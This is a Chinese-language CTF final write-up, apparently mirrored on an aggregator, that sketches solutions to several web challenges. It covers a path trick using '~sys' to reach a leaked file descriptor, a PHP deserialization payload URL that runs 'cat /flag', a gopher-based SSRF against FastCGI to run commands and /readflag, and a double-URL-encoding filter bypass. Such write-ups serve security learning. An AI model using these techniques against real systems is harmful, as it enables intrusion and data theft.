1

强国杯决赛Writeup

 1 year ago
source link: https://guokeya.github.io/post/JSF9GgDPM/
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.

Author:没队伍一人康康题

c0ol P@th

expanduser可以~开头转换对应用户的home。对应/etc/passwd
使用~sys。即可转换为/dev/

刚好flag open了。没close。会有一个fd留着
爆破~sys/fd/6

32加32

16进制 base64 zip解压

<?php

class kaka
{

    public $pass = true;
    public $name = '1';
    public $age = '1';


    public function cflag()
    {
        if ($this->pass) {
            eval(system('cat /flag'));
        } else {
            echo "no word, flag";
        }
    }

    public function cname($n, $a)
    {
        if ($this->name === $n) {
            if ($this->age === $a) {
                return true;
            }
        }
    }
}
$data=serialize(new kaka());
echo $data;

http://39.107.127.105:50906/?pop=O:4:%22kaka%22:3:{s:4:%22pass%22;b:1;s:4:%22name%22;s:1:%221%22;s:3:%22age%22;s:1:%221%22;}&name=lilei&age=two

ezxunrui

找更新日志

全局搜dr_catcher_data

可以控制参数进入ssrf。nginx一般是fastcgi。打gopher ssrf

先ls|base64 -w0 一次发现有/readflag
然后读flag

http://39.106.156.96:46243/index.php?s=api&c=api&m=qrcode&thumb=gopher payload&text=123&level=1&size=1

https://www.ctfiot.com/59624.html

root起的java。。非预期直接两次URL编码绕过flag关键字过滤

下一篇: 强网拟态初赛web→

Related Issues not found

Please contact @guokeya to initialize the comment


report

Recommend

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK